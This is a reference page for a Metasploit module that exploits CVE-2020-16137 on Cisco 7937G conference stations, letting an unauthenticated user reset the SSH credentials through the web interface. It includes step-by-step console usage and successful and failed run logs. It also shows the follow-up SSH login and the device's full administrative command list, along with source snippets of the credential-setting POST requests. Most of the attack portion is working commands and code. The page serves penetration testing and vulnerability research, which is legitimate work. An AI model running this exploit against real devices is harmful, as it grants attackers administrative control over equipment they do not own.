Cisco 7937G SSH Privilege Escalation - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/cisco_7937g_ssh_privesc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco 7937G SSH Privilege Escalation
Module: auxiliary/admin/http/cisco_7937g_ssh_privesc
Source code: modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
Disclosure date: 2020-06-02
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-16137
This module exploits a feature that should not be available via the web interface. An unauthenticated user may change the credentials for SSH access to any username and password combination desired, giving access to administrative functions through an SSH connection.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf auxiliary(cisco_7937g_ssh_privesc) > show options
... show and set options ...
msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS ip-range
msf auxiliary(cisco_7937g_ssh_privesc) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Cisco 7937G Conference Station. This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
Description
This module exploits a feature that should not be available via the web interface. An unauthenticated user may set the credentials for SSH access to any username and password combination desired, giving access to administrative functions through an SSH connection.
Verification Steps
- Obtain a Cisco 7937G Conference Station.
- Enable Web Access and SSH Access on the device.
- Start msfconsole
- Do:
use auxiliary/admin/http/cisco_7937g_ssh_privesc
- Do:
set RHOSTS 192.168.1.10
- Do:
set USER test
- Do:
set PASS test
- Do:
run
- The conference station's SSH service should now be configured with the supplied USER:PASS.
Options
PASS
The desired password for setting SSH access
USER
The desired username for setting SSH access
Scenarios
Cisco 7937G Running Firmware Version SCCP-1-4-5-7
Successful Scenario
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[email protected]'s password:
$>help
Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.
Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory. ,,
m - Display memory. ,
ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
ifShow - Display ethernet interface statistics (no parameters)
showStoredConfig - Display configuration as stored in flash (no parameters)
showRunningConfig - Display the current running configuration (no parameters)
showBackupConfig - Display backup configuration as stored in flash (no parameters)
overrideBackupConfig - Override backup flash config with current config (no parameters)
overrideSecurityBackup - Override backup security sector with current security sector.
resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
configDhcpSet - Set DHCP parameters in the flash.
(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type,
Using statically configured boot server[YES|NO])
configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
configNetSet - Set network parameters in the flash.
(IP Address, Subnet Mask, Router, VLAN(can be empty))
configProvisioningSet - Set provisioning server parameters in the flash.
(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
nslookup - Find the IP for a given hostname
dnsCacheAShow - Show DNS Cache for A records.
Commands 41 to 61:
dnsCacheSrvShow - Show DNS Cache for SRV records.
dnsCacheAFlush - Flush DNS A records from cache.
version - Display vxWorks bootline, software versions, and hardware version.
hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!.
hwVarSet - Set the contents of a hardware var ([var ID] [new value])
hwVarShow - Display the contents of a hardware var ([var ID])
simulateKeyPress - Send a key Press event to so like it came from hardware.
simulateKeyHold - Send a key Hold event to so like it came from hardware.
simulateKeyRelease - Send a key Release event to so like it came from hardware.
simulateHookUp - Send a hookswitch event to so like it came from hardware.
simulateHookDown - Send a hookswitch event to so like it came from hardware.
ncasMisc - Show misc. non-call information (no parameters)
ncasCb - Show detailed ncas information, related to either call services,
non-call services, or server information (1, 2, or 3)
uptime - Show phone uptime.
appPrt - Show UI's call status.
fntPrt - Show information about fonts available on phone.
memtop - Shows the top poiter to current memory.
removeScheduledLogEntry - debug
addScheduledLogEntry - debug
fatalError - Simulate fatal error for the phone.
Commands 61 to 81:
enableStrTruncLog - Enable logging of string truncation.
disableStrTruncLog - Disable logging of string truncation.
sendFlashBinImage - Upload binary flash image.
setMac - debug, here because PSOS can't set the MAC.
sg - send a bitmap to the boot server
memShow - Display system memory usage
memDebug - Toggle memory manager trace flag
l2Debug - Toggle memory manager trace flag
wsTest - Web Service Test Tool
fxShow - Display file transfer manager status
utilHostByNameShow - Test utilHostByName
utilDnsShow - Show callbacks for dns queries
dnsCacheShow - Show DNSACacheShow
utilEthLinkShow - Show Ethernet link status
ethConfigTest - Set Ethernet Mode (0 to 4)
timeTest - Test time
contrastChg - Change LCD Contrast
setAdminVlan - Set admin vlan id
setL2Auth - Set L2 Auth Enable/Disable
ipAddrChange - Change ip addr configuration
Commands 81 to 101:
tftpChange - Change tftp addr
arpStats - Print ARP statistics
fxPut - Transfer file to remote
crash - Crash the system
ipAddrShow - Show ip addr
rtosSocketShow - Show rtos socket information
sccpShow - Show protocol
regManagerShow - show registration manager state
uiPrintAll - uiPrintAll
uiPrintSoftKeys - uiPrintSoftKeys
getVoiceQuality - displays voice quality control status
uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
uiStartTone - uiStartTone
uiStopTone - uiStopTone
pegPrintAll - pegPrintAll
uiSMPrintAll - uiStateMachinePrintAll
lldpSMPrintAll - lldpStateMachinePrintAll
saveLogLevels - saveLogLevels
localePrintAll - localePrintAll
ceShow - Show Client Engine Status
Commands 101 to 121:
udiShow - Show Unique Device Indentifier
show - Show Unique Device Indentifier
pbnShow - Display app & bootrom headers
upr - Upgrade to a Rockpile Standalone Image
upm - Upgrade to a Rockpile Manf Image
setHw - Sets the Rockpile Hardware Id
getHw - Prints the Rockpile Hardware Id
setUpf - Sets the Upgrade progress flag
rstUpf - Resets the Upgrade progress flag
setMdm - Sets the Manf diag mode flag
rstMdm - Resets the Manf diag mode flag
setDhcp - Sets the Manf diag dhcp flag
rstDhcp - Resets the Manf diag dhcp flag
setOrd - Sets the ORD flag
rstOrd - Resets the ORD flag
fs - Prin the status of rockpile flags
cp - Mfg. test diags
vol - Mfg. test diags
sig - Mfg. test diags
os - Mfg. test diags
Commands 121 to 141:
lcd - Mfg. test diags
sum - Prints checksums of flash images
rd - Mfg. test diags
wr - Mfg. test diags
eth - Start/stop ethernet hardware
fstp - Stop FGPIO interface
hfTxEq - Audio testing for large conf rooms
ctConv - perform ct convergence test.
ctModeEnd - terminate ctMode
ctEnableRx - Enable ctRx 1 on, 0 off
ctEnableTx - Enable ctTx 1 on, 0 off
ctMicTx - Route mic # to Tx
ctEMTx - Route external mic # to Tx
ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctRxSpkr - Send directly to HF speaker
ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
displayListeningPorts - Display listening port and process info
killListeningProcess - Kill the task associated with the port
$>exit
Unsuccessful Scenario
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Cisco 7937G Running Firmware Version SCCP-1-4-5-5
Successful Scenario
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[email protected]'s password:
$>help
Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.
Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory. ,,
m - Display memory. ,
ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
ifShow - Display ethernet interface statistics (no parameters)
showStoredConfig - Display configuration as stored in flash (no parameters)
showRunningConfig - Display the current running configuration (no parameters)
showBackupConfig - Display backup configuration as stored in flash (no parameters)
overrideBackupConfig - Override backup flash config with current config (no parameters)
overrideSecurityBackup - Override backup security sector with current security sector.
resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
configDhcpSet - Set DHCP parameters in the flash.
(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type,
Using statically configured boot server[YES|NO])
configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
configNetSet - Set network parameters in the flash.
(IP Address, Subnet Mask, Router, VLAN(can be empty))
configProvisioningSet - Set provisioning server parameters in the flash.
(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
nslookup - Find the IP for a given hostname
dnsCacheAShow - Show DNS Cache for A records.
Commands 41 to 61:
dnsCacheSrvShow - Show DNS Cache for SRV records.
dnsCacheAFlush - Flush DNS A records from cache.
version - Display vxWorks bootline, software versions, and hardware version.
hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!.
hwVarSet - Set the contents of a hardware var ([var ID] [new value])
hwVarShow - Display the contents of a hardware var ([var ID])
simulateKeyPress - Send a key Press event to so like it came from hardware.
simulateKeyHold - Send a key Hold event to so like it came from hardware.
simulateKeyRelease - Send a key Release event to so like it came from hardware.
simulateHookUp - Send a hookswitch event to so like it came from hardware.
simulateHookDown - Send a hookswitch event to so like it came from hardware.
ncasMisc - Show misc. non-call information (no parameters)
ncasCb - Show detailed ncas information, related to either call services,
non-call services, or server information (1, 2, or 3)
uptime - Show phone uptime.
appPrt - Show UI's call status.
fntPrt - Show information about fonts available on phone.
memtop - Shows the top poiter to current memory.
removeScheduledLogEntry - debug
addScheduledLogEntry - debug
fatalError - Simulate fatal error for the phone.
Commands 61 to 81:
enableStrTruncLog - Enable logging of string truncation.
disableStrTruncLog - Disable logging of string truncation.
sendFlashBinImage - Upload binary flash image.
setMac - debug, here because PSOS can't set the MAC.
sg - send a bitmap to the boot server
memShow - Display system memory usage
memDebug - Toggle memory manager trace flag
l2Debug - Toggle memory manager trace flag
wsTest - Web Service Test Tool
fxShow - Display file transfer manager status
utilHostByNameShow - Test utilHostByName
utilDnsShow - Show callbacks for dns queries
dnsCacheShow - Show DNSACacheShow
utilEthLinkShow - Show Ethernet link status
ethConfigTest - Set Ethernet Mode (0 to 4)
timeTest - Test time
contrastChg - Change LCD Contrast
setAdminVlan - Set admin vlan id
setL2Auth - Set L2 Auth Enable/Disable
ipAddrChange - Change ip addr configuration
Commands 81 to 101:
tftpChange - Change tftp addr
arpStats - Print ARP statistics
fxPut - Transfer file to remote
crash - Crash the system
ipAddrShow - Show ip addr
rtosSocketShow - Show rtos socket information
sccpShow - Show protocol
regManagerShow - show registration manager state
uiPrintAll - uiPrintAll
uiPrintSoftKeys - uiPrintSoftKeys
getVoiceQuality - displays voice quality control status
uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
uiStartTone - uiStartTone
uiStopTone - uiStopTone
pegPrintAll - pegPrintAll
uiSMPrintAll - uiStateMachinePrintAll
lldpSMPrintAll - lldpStateMachinePrintAll
saveLogLevels - saveLogLevels
localePrintAll - localePrintAll
ceShow - Show Client Engine Status
Commands 101 to 121:
udiShow - Show Unique Device Indentifier
show - Show Unique Device Indentifier
pbnShow - Display app & bootrom headers
upr - Upgrade to a Rockpile Standalone Image
upm - Upgrade to a Rockpile Manf Image
setHw - Sets the Rockpile Hardware Id
getHw - Prints the Rockpile Hardware Id
setUpf - Sets the Upgrade progress flag
rstUpf - Resets the Upgrade progress flag
setMdm - Sets the Manf diag mode flag
rstMdm - Resets the Manf diag mode flag
setDhcp - Sets the Manf diag dhcp flag
rstDhcp - Resets the Manf diag dhcp flag
setOrd - Sets the ORD flag
rstOrd - Resets the ORD flag
fs - Prin the status of rockpile flags
cp - Mfg. test diags
vol - Mfg. test diags
sig - Mfg. test diags
os - Mfg. test diags
Commands 121 to 141:
lcd - Mfg. test diags
sum - Prints checksums of flash images
rd - Mfg. test diags
wr - Mfg. test diags
eth - Start/stop ethernet hardware
fstp - Stop FGPIO interface
hfTxEq - Audio testing for large conf rooms
ctConv - perform ct convergence test.
ctModeEnd - terminate ctMode
ctEnableRx - Enable ctRx 1 on, 0 off
ctEnableTx - Enable ctTx 1 on, 0 off
ctMicTx - Route mic # to Tx
ctEMTx - Route external mic # to Tx
ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctRxSpkr - Send directly to HF speaker
ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
displayListeningPorts - Display listening port and process info
killListeningProcess - Kill the task associated with the port
$>exit
Unsuccessful Scenario
msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
rhosts => 192.168.110.209
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the admin/http/cisco_7937g_ssh_privesc auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show info
Name: Cisco 7937G SSH Privilege Escalation
Module: auxiliary/admin/http/cisco_7937g_ssh_privesc
License: GNU Public License v2.0
Rank: Normal
Disclosed: 2020-06-02
Provided by:
Cody Martin
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASS yes Desired password
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes Timeout in seconds
USER yes Desired username
Description:
This module exploits a feature that should not be available via the
web interface. An unauthenticated user may change the credentials
for SSH access to any username and password combination desired,
giving access to administrative functions through an SSH connection.
References:
https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
https://nvd.nist.gov/vuln/detail/CVE-2020-16137
Module Options
This is a complete list of options available in the admin/http/cisco_7937g_ssh_privesc auxiliary module:
msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show options
Module options (auxiliary/admin/http/cisco_7937g_ssh_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS yes Desired password
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes Timeout in seconds
USER yes Desired username
Advanced Options
Here is a complete list of advanced options supported by the admin/http/cisco_7937g_ssh_privesc auxiliary module:
msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show advanced
Module advanced options (auxiliary/admin/http/cisco_7937g_ssh_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/cisco_7937g_ssh_privesc module can do:
msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/cisco_7937g_ssh_privesc auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Python module dependency (requests) is missing, cannot continue
- Please execute pip3 install requests.
- Device doesn't appear to be functioning or web access is not enabled.
- Device doesn't appear to be functioning or web access is not enabled.
- Device doesn't appear to be functioning or web access is not enabled.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Python module dependency (requests) is missing, cannot continue
Here is a relevant code snippet related to the "Python module dependency (requests) is missing, cannot continue" error message:
58:
59:
60: def run(args):
61: module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
62: if dependency_missing:
63: logging.error('Python module dependency (requests) is missing, cannot continue')
64: logging.error('Please execute pip3 install requests.')
65: return
66:
67: url = "http://{}/localmenus.cgi".format(args['rhost'])
68: payload_user = {"func": "403", "set": "401",
Please execute pip3 install requests.
Here is a relevant code snippet related to the "Please execute pip3 install requests." error message:
59:
60: def run(args):
61: module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
62: if dependency_missing:
63: logging.error('Python module dependency (requests) is missing, cannot continue')
64: logging.error('Please execute pip3 install requests.')
65: return
66:
67: url = "http://{}/localmenus.cgi".format(args['rhost'])
68: payload_user = {"func": "403", "set": "401",
69: "name1": args['USER'], "name2": args['USER']}
Device doesn't appear to be functioning or web access is not enabled.
Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:
72: logging.info("Attempting to set SSH credentials.")
73: try:
74: r = requests.post(url=url, params=payload_user,
75: timeout=int(args['TIMEOUT']))
76: if r.status_code != 200:
77: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78: return
79:
80: r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
81: if r.status_code != 200:
82: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
Device doesn't appear to be functioning or web access is not enabled.
Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:
77: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78: return
79:
80: r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
81: if r.status_code != 200:
82: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
83: return
84: except requests.exceptions.RequestException:
85: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
86: return
87:
Device doesn't appear to be functioning or web access is not enabled.
Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:
80: r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
81: if r.status_code != 200:
82: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
83: return
84: except requests.exceptions.RequestException:
85: logging.error("Device doesn't appear to be functioning or web access is not enabled.")
86: return
87:
88: logging.info("SSH attack finished!")
89: logging.info(("Try to login using the supplied credentials {}:{}").format(
90: args['USER'], args['PASS']))
Go back to menu.
Related Pull Requests
References
- https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
- CVE-2020-16137
See Also
Check also the following modules related to this module:
- auxiliary/admin/networking/cisco_asa_extrabacon
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/cisco_dcnm_auth_bypass
- auxiliary/admin/networking/cisco_dcnm_download
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/cisco_asa_asdm
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/http/cisco_device_manager
- auxiliary/scanner/http/cisco_directory_traversal
- auxiliary/scanner/http/cisco_firepower_download
- auxiliary/scanner/http/cisco_firepower_login
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/cisco_nac_manager_traversal
- auxiliary/scanner/http/cisco_ssl_vpn
- auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
- auxiliary/scanner/ike/cisco_ike_benigncertain
- auxiliary/scanner/misc/cisco_smart_install
- auxiliary/scanner/snmp/cisco_config_tftp
- auxiliary/scanner/snmp/cisco_upload_file
- auxiliary/voip/cisco_cucdm_call_forward
- auxiliary/voip/cisco_cucdm_speed_dials
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/dos/cisco/ios_telnet_rocem
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
Authors
- Cody Martin
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.